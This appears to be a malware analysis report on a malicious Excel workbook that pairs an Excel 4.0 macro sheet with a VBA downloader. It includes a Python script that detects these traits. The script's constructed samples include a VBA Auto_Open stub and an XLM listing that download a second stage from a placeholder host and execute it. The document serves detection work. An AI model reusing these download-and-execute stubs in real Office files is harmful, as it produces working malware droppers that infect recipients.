Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 5c6c0c5a94f60a71…

MALICIOUS

Office (OLE) / .XLS

Size: 56.5 KB    Created: 2021-03-29 13:21:49
MD5:     0801368e0e80ba88daad52d7e5977d22
SHA-1:   e8e2c197939ca869e7c6d120b27f1dcd35e20342
SHA-256: 5c6c0c5a94f60a71467c535e094d8a9e62e677115cf35b50683fe6bf5d716c29
Risk Score: 160

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1105 Ingress Tool Transfer

This Excel workbook carries both an Excel 4.0 (XLM) macro sheet and VBA macros. The VBA code references the urlmon URLDownloadToFileA API, which indicates an attempt to fetch a second-stage payload from a remote host (T1105) for execution. The combination is itself a strong indicator: XLM macro sheets are rarely used in modern legitimate workbooks, and pairing an XLM sheet with a VBA downloader is the staged pattern seen throughout the 2020-2022 Office malware wave, where one macro type supplies the auto-open entry point and the other fetches the next stage. The heuristics alone do not expose the download URL or the drop path; the carved VBA source and XLM listing under Extracted artifacts should be read for those, and for any string obfuscation that would defeat a simple string match.

Heuristics (4)

  • [critical] SC_STR_URLDOWNLOAD: Reference to URLDownloadToFile API
    The urlmon URLDownloadToFile API name appears in the file's strings.
  • [critical] OLE_VBA_DOWNLOAD: URLDownloadToFile in VBA
    URLDownloadToFile is referenced from the decoded VBA macro code, i.e. the download capability is wired into the macro logic, not merely present as a stray string.
  • [medium] OLE_XLM_AUTOOPEN: Excel 4.0 (XLM) macro sheet present
    Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • [medium] OLE_VBA_MACROS: VBA macros detected
    Document contains VBA macro code.
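The four heuristics above, and the download-then-execute chain the Malware Insights summary describes, reduce to string and pattern checks over the carved macro text. The following Python is an added example written for this page; it is not code from the analysis platform or from oletools. It re-creates the four rules over constructed sample inputs (a VBA downloader stub, an XLM cell listing, and a few raw bytes with the API name stored as UTF-16LE) and applies an assumed verdict rule (any critical finding is MALICIOUS, any medium-only result is SUSPICIOUS). The rule identifiers are taken from the report; the sample text, the listing format and the verdict thresholds are assumptions.

```python
"""Triage of macro text carved from an OLE workbook.

Re-creates the four heuristics from the report as plain Python over the kind
of text an olevba-style extraction produces. All sample inputs below are
constructed for this example; they are not the artifacts carved from the
analysed sample, and the verdict rule is an assumption, not the platform's.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule_id: str
    severity: str
    detail: str


# Matches the ANSI (A) and Unicode (W) exports of urlmon.dll.
URLDOWNLOAD_RE = re.compile(r"URLDownloadToFile[AW]?", re.IGNORECASE)
# Excel 4.0 macro functions that do not occur in ordinary worksheet formulas.
XLM_FUNCTIONS = ("CALL", "EXEC", "REGISTER", "FORMULA", "HALT", "RUN")
XLM_FUNC_RE = re.compile(r"=\s*(%s)\s*\(" % "|".join(XLM_FUNCTIONS), re.IGNORECASE)
AUTO_OPEN_RE = re.compile(r"\bAuto_Open\b", re.IGNORECASE)


def scan_strings(raw: bytes) -> list[Finding]:
    """SC_STR_URLDOWNLOAD: the API name anywhere in the raw file bytes.
    OLE streams hold strings in 8-bit or UTF-16LE form, so both are tried."""
    needle = "URLDownloadToFile"
    hits = [enc for enc in ("ascii", "utf-16-le")
            if needle.encode(enc).lower() in raw.lower()]
    if not hits:
        return []
    return [Finding("SC_STR_URLDOWNLOAD", "critical",
                    "Reference to URLDownloadToFile API (%s)" % ", ".join(hits))]


def scan_vba(src: str) -> list[Finding]:
    """OLE_VBA_MACROS and OLE_VBA_DOWNLOAD over decoded VBA source."""
    findings = []
    if src.strip():
        findings.append(Finding("OLE_VBA_MACROS", "medium", "Document contains VBA macro code"))
    m = URLDOWNLOAD_RE.search(src)
    if m:
        findings.append(Finding("OLE_VBA_DOWNLOAD", "critical",
                                "URLDownloadToFile in VBA (%s)" % m.group(0)))
    return findings


def scan_xlm(listing: str) -> list[Finding]:
    """OLE_XLM_AUTOOPEN over an XLM listing: flag the macro sheet, record which
    Excel 4.0 functions it calls and whether an Auto_Open entry point is present."""
    funcs = sorted({m.group(1).upper() for m in XLM_FUNC_RE.finditer(listing)})
    if not funcs:
        return []
    detail = "Excel 4.0 macro sheet present, calls: " + ", ".join(funcs)
    if AUTO_OPEN_RE.search(listing):
        detail += "; Auto_Open entry point"
    return [Finding("OLE_XLM_AUTOOPEN", "medium", detail)]


def triage(raw: bytes, vba_src: str, xlm_listing: str) -> tuple[str, list[Finding]]:
    """Assumed verdict rule: any critical finding is MALICIOUS, medium-only is SUSPICIOUS."""
    findings = scan_strings(raw) + scan_vba(vba_src) + scan_xlm(xlm_listing)
    severities = {f.severity for f in findings}
    if "critical" in severities:
        return "MALICIOUS", findings
    if "medium" in severities:
        return "SUSPICIOUS", findings
    return "CLEAN", findings


# Constructed sample: a VBA downloader stub of the kind OLE_VBA_DOWNLOAD targets.
SAMPLE_VBA = '''Attribute VB_Name = "Module1"
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" ( _
    ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, _
    ByVal dwReserved As Long, ByVal lpfnCB As LongPtr) As Long

Sub Auto_Open()
    URLDownloadToFileA 0, "http://example.invalid/stage2.bin", Environ("TEMP") & "\\s2.bin", 0, 0
End Sub
'''
# Constructed sample: an XLM listing in a cell-by-cell form (format assumed).
SAMPLE_XLM = '''Macro1!$A$1: =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://example.invalid/s2","C:\\s2",0,0)
Macro1!$A$2: =EXEC("C:\\s2")
Macro1!$A$3: =HALT()
Auto_Open -> Macro1!$A$1
'''
# Constructed raw bytes: OLE magic, padding, then the API name stored as UTF-16LE.
SAMPLE_RAW = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 8 + "URLDownloadToFileA".encode("utf-16-le")
# Constructed benign module: macros present, no downloader.
BENIGN_VBA = 'Sub Tidy()\n    Range("A1").Font.Bold = True\nEnd Sub\n'

if __name__ == "__main__":
    verdict, found = triage(SAMPLE_RAW, SAMPLE_VBA, SAMPLE_XLM)
    print(verdict)
    for f in found:
        print("  [%s] %s: %s" % (f.severity, f.rule_id, f.detail))
```

Run it directly to print the verdict and the four findings. The UTF-16LE check is the part worth carrying into real tooling: an ASCII-only string scan can miss the API name when it is stored as 16-bit code units inside an OLE stream, while the decoded VBA source still shows it, so a string-level rule and a VBA-level rule that disagree are a hint to look at encoding or obfuscation rather than to discount either finding.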

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
  Kind:    xlm-macro
  Source:  oletools.olevba.extract_all_macros (XLM macro listing)
  Size:    721 bytes
  SHA-256: e686b98bb050ee154556e795c2a1702fc38d29774627593d0e77d5b6baa394c3

Filename: macros.bas
  Kind:    vba-macro
  Source:  oletools.olevba.extract_macros (decoded VBA source)
  Size:    2860 bytes
  SHA-256: 3db9897cbfe5c23523c7ee6e487c95266751174ddb6f1efae00d37e50a3cddfe